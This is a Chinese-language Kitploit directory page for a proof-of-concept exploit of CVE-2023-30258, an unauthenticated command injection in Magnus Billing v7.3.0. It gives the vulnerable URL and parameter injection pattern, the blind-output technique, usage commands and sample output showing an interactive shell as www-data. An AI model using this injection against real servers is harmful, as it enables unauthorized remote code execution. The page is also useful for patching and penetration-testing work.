Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-30258-Magnus-Billing-v7-Command-Injection-PoC — Magnus Billing v7.3.0 中存在未认证的命令注入漏洞。 | Kitploit
工具/GitHubGitHub/estebanzarate/cve-2023-30258-magnus-billing-v7-command-injection-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubestebanzarate/cve-2023-30258-magnus-billing-v7-command-injection-poc

CVE-2023-30258-Magnus-Billing-v7-Command-Injection-PoC

Magnus Billing v7.3.0 中存在未认证的命令注入漏洞。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
167个月前尚未审核
分享

CVE-2023-30258 — Magnus Billing v7 命令注入(PoC)

Magnus Billing v7.3.0 存在未经身份验证的命令注入漏洞。icepay.php 中的 democ GET 参数未经过滤直接传递给 shell 函数,从而允许以 Web 服务器用户身份执行任意命令。该注入为盲注——输出不会反映在 HTTP 响应中——因此本漏洞利用脚本将每条命令的输出重定向到 webroot 内的文件中,并通过 HTTP 将其取回。


工作原理

  1. 向 /mbilling/lib/icepay/icepay.php?democ=;<command>; 发送 GET 请求。
  2. 将命令输出重定向到 webroot 内的文件(out.txt)。
  3. 通过 HTTP 获取输出文件并打印结果。
  4. 退出时清理输出文件。

如果目标使用不同的 webroot 路径,请调整脚本顶部的 OUTPUT_FILE。

环境要求

  • Python 3
  • 安装依赖:
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

用法

python3 exploit.py -t http://TARGET

示例:

$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> whoami
www-data

参考

  • CVE-2023-30258
  • EDB-52170
  • Tinashe Matanda 的原始 PoC

致谢

  • 发现与原始漏洞利用: Tinashe Matanda (SadNinja) / CodeSecLab
  • 清理与交互式 Shell: Esteban Zárate
下载工具